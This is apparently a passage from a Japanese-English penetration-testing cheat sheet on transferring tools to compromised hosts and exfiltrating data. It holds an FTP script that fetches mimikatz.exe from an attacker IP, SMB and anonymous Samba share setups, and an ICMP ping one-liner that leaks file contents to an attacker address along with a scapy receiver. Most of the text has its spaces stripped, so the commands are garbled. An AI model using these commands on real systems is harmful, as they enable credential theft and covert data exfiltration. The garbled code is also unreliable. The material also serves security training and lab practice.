#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows クライアント
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kaliをサーバーとして使用
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
または、Sambaを使用してSMB共有を作成します:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Exfiltration Techniques
Exfiltration Over Command and Control Channel
During post-exploitation, an attacker can exfiltrate data over the command and control channel. This can be achieved by executing commands on the compromised system to transfer files or exfiltrate sensitive information to the attacker-controlled server.
Exfiltration Over Alternative Protocols
Attackers can also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTP. By encoding the data and sending it over these protocols, attackers can bypass network security controls and exfiltrate data without being detected easily.
Exfiltration Over Encrypted Channels
To avoid detection, attackers may exfiltrate data over encrypted channels such as HTTPS or SSH. By leveraging encryption, attackers can make it harder for security tools to inspect the exfiltrated data, increasing the chances of successful exfiltration.
Exfiltration Using Steganography
Steganography involves hiding data within other non-secret files or communication channels. Attackers can embed sensitive information within images, audio files, or other digital content and exfiltrate it without arousing suspicion.
Exfiltration Using Covert Channels
Covert channels are hidden communication paths that are not normally used for data transfer. Attackers can leverage covert channels to exfiltrate data without being detected by traditional security mechanisms, making it challenging for defenders to monitor and prevent data exfiltration.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)